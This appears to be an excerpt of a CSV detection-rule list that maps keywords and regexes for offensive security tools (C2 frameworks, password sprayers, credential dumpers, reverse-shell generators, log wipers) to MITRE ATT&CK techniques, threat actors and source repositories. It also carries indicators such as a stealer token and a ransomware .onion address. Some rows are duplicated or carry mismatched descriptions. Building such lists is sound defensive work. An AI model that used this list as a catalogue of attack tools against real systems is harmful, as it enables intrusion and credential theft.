"*MSHTAStager*",".{0,1000}MSHTAStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","52418"
"*MSIEXEC - GAC backdoor installed*",".{0,1000}MSIEXEC\s\-\sGAC\sbackdoor\sinstalled.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","0","#content","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","52419"
"*MSIL/KeeThief.A!tr.pws*",".{0,1000}MSIL\/KeeThief\.A!tr\.pws.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#Avsignature","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","52467"
"*MSIL/PSW.KeeThief.A*",".{0,1000}MSIL\/PSW\.KeeThief\.A.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#Avsignature","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","52468"
"*msi-search-main.zip*",".{0,1000}msi\-search\-main\.zip.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","N/A","10","3","276","31","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z","52470"
"*msLDAPDump.py*",".{0,1000}msLDAPDump\.py.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","N/A","3","226","31","2024-09-23T18:11:26Z","2022-12-30T23:35:40Z","52471"
"*MSOfficeManipulator.cs*",".{0,1000}MSOfficeManipulator\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","52472"
"*msol_dump*",".{0,1000}msol_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","52473"
"*msol_dump.ps1*",".{0,1000}msol_dump\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","52474"
"*MSOLSpray *",".{0,1000}MSOLSpray\s.{0,1000}","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003 - T1621","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MSOLSpray","1","0","N/A","network exploitation tool","10","10","964","174","2024-03-19T11:03:06Z","2020-03-16T13:38:22Z","52475"
"*MSOLSpray.git*",".{0,1000}MSOLSpray\.git.{0,1000}","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003 - T1621","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MSOLSpray","1","1","N/A","network exploitation tool","10","10","964","174","2024-03-19T11:03:06Z","2020-03-16T13:38:22Z","52476"
"*MSOLSpray.ps1*",".{0,1000}MSOLSpray\.ps1.{0,1000}","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003 - T1621","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MSOLSpray","1","1","N/A","network exploitation tool","10","10","964","174","2024-03-19T11:03:06Z","2020-03-16T13:38:22Z","52477"
"*MSOLSpray-master*",".{0,1000}MSOLSpray\-master.{0,1000}","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003 - T1621","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MSOLSpray","1","1","N/A","network exploitation tool","10","10","964","174","2024-03-19T11:03:06Z","2020-03-16T13:38:22Z","52478"
"*mspass.exe*",".{0,1000}mspass\.exe.{0,1000}","offensive_tool_keyword","mspass","MessenPass can only be used to recover the passwords for the current logged-on user on your local computer. and it only works if you chose the remember your password in one of the above programs. You cannot use this utility for grabbing the passwords of other users.","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mspass.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","52479"
"*mspass.zip*",".{0,1000}mspass\.zip.{0,1000}","offensive_tool_keyword","mspass","MessenPass can only be used to recover the passwords for the current logged-on user on your local computer. and it only works if you chose the remember your password in one of the above programs. You cannot use this utility for grabbing the passwords of other users.","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mspass.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","52480"
"*msquic_openssl/msquic.dll*",".{0,1000}msquic_openssl\/msquic\.dll.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Exploitation tool","https://github.com/xpn/ntlmquic","1","1","N/A","network exploitation tool","6","2","122","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z","52481"
"*msquic_openssl/msquic.lib*",".{0,1000}msquic_openssl\/msquic\.lib.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Exploitation tool","https://github.com/xpn/ntlmquic","1","1","N/A","network exploitation tool","6","2","122","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z","52482"
"*MS-RPNVulnerableDC.txt*",".{0,1000}MS\-RPNVulnerableDC\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","52483"
"*MS-RPRN.exe *",".{0,1000}MS\-RPRN\.exe\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation From attacking machine entice the Domain Controller to connect using the printer bug. Binary from here https://github.com/leechristensen/SpoolSample","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","52484"
"*MS-RPRN.exe \\* \\*/pipe/pwned*",".{0,1000}MS\-RPRN\.exe\s\\\\.{0,1000}\s\\\\.{0,1000}\/pipe\/pwned.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","52485"
"*mssgbox_shellcode_arranged_x64.b64*",".{0,1000}mssgbox_shellcode_arranged_x64\.b64.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","52486"
"*mssgbox_shellcode_exitfunc_thread_x64.bin*",".{0,1000}mssgbox_shellcode_exitfunc_thread_x64\.bin.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","52487"
"*mssgbox_shellcode_x64.b64*",".{0,1000}mssgbox_shellcode_x64\.b64.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","52488"
"*mssgbox_shellcode_x64.bin*",".{0,1000}mssgbox_shellcode_x64\.bin.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","52489"
"*mssgbox_shellcode_x64.bin*",".{0,1000}mssgbox_shellcode_x64\.bin.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","52490"
"*mssgbox_shellcode_x64_with_hexsymbol.txt*",".{0,1000}mssgbox_shellcode_x64_with_hexsymbol\.txt.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","52491"
"*mssgbox_shellcode_x64_without_hexsymbol.txt*",".{0,1000}mssgbox_shellcode_x64_without_hexsymbol\.txt.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","52492"
"*mssql_brute.rc*",".{0,1000}mssql_brute\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52493"
"*mssql_local_auth_bypass.*",".{0,1000}mssql_local_auth_bypass\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52494"
"*mssql_local_hashdump.rb*",".{0,1000}mssql_local_hashdump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52495"
"*mssqlattack.py*",".{0,1000}mssqlattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","52496"
"*mssqlattack.py*",".{0,1000}mssqlattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","52497"
"*mssqlproxy-master*",".{0,1000}mssqlproxy\-master.{0,1000}","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform Lateral Movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","N/A","10","8","741","114","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z","52498"
"*mssqlrelayclient.*",".{0,1000}mssqlrelayclient\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","52499"
"*mssqlrelayclient.py*",".{0,1000}mssqlrelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","52500"
"*mssqlsvc.kirbi*",".{0,1000}mssqlsvc\.kirbi.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Crack with TGSRepCrack","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","52501"
"*msv7eaydbdue7x6hos2kzbtwgoi7xmtuddlqgniqghs3qc54wajudwad.onion*",".{0,1000}msv7eaydbdue7x6hos2kzbtwgoi7xmtuddlqgniqghs3qc54wajudwad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","52502"
"*MTE2NTc2MDM5MjY5NDM1NDA2MA.GRSNK7.OHxJIpJoZxopWpF_S3zy5v2g7k2vyiufQ183Lo*","MTE2NTc2MDM5MjY5NDM1NDA2MA\.GRSNK7\.OHxJIpJoZxopWpF_S3zy5v2g7k2vyiufQ183Lo","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","52503"
"*mthbernardes*rsg*",".{0,1000}mthbernardes.{0,1000}rsg.{0,1000}","offensive_tool_keyword","rsg","A tool to generate various ways to do a reverse shell","T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007","TA0002 - TA0011 - TA0003","N/A","N/A","Resource Development","https://github.com/mthbernardes/rsg","1","1","N/A","N/A","N/A","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","52504"
"*mthbernardes/rsg*",".{0,1000}mthbernardes\/rsg.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","1","N/A","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","52505"
"*mttaggart/OffensiveNotion*",".{0,1000}mttaggart\/OffensiveNotion.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","N/A","10","10","1161","130","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z","52506"
"*mtth-bfft/adeleg*",".{0,1000}mtth\-bfft\/adeleg.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","1","N/A","N/A","8","3","294","31","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z","52507"
"*mufeedvh/moonwalk*",".{0,1000}mufeedvh\/moonwalk.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","1","#linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","52508"
"*multi_meter_inject.rb*",".{0,1000}multi_meter_inject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52510"
"*multi_vendor_cctv_dvr_pass*",".{0,1000}multi_vendor_cctv_dvr_pass.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52511"
"*multibit2john.py*",".{0,1000}multibit2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","52512"
